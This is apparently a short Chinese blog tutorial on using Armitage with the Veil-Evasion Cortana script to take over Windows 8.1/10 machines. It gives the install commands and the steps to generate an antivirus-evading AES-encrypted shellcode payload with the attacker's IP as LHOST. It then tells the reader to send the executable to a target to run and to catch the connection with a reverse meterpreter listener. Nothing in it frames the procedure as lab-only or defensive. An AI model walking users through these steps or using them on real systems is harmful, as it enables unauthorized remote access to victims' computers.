Armitage + Veil Evasion cna Hacking Windows 8.1/10

armitage官网:http://www.fastandeasyhacking.com/
https://www.youtube.com/watch?v=IiOlrShWF44
https://www.youtube.com/watch?v=x50blh_G5zA(安装讲解)

cd /tmp
git clone https://github.com/Veil-Framework/Veil-Evasion.git
cd Veil-Evasion
cd setup
bash setup.sh
Y
bash setup.sh -c
然后就是各种默认安装了。
cd ..
python Veil-Evasion.py

postgresql start

armitage

点击armitage,script,load
Veil-Evasion/tools/cortana/veil_evasion.cna

Veil-Evasion,set Veil-Evasion path
把Veil-Evasion.py的绝对路径粘贴上

Veil-Evasion,Generate
outputbase  起个英文名字,payload默认名字
LHOSTS  你的IP
payload看心情选
这里选35试试,python/shellcode_inject/aes_encrypt
勾选overwrit payloads
点generate

复制output的路径,看一下生成的exe,发给目标执行

一般是在/user下的

armitage,listeners,reverse
端口随意
type选meterpreter
然后armitage,listeners,set LHOST 你的IP

有个奇葩的问题,对方执行一次你生成的那个exe,你这里就可以建立一个会话,也就是说,同一个主机,他多开几次你给的exe文件,你这就显示上线了一个主机,但建立了很多会话连接,要疯。

你可能感兴趣的:(Armitage + Veil Evasion cna Hacking Windows 8.1/10)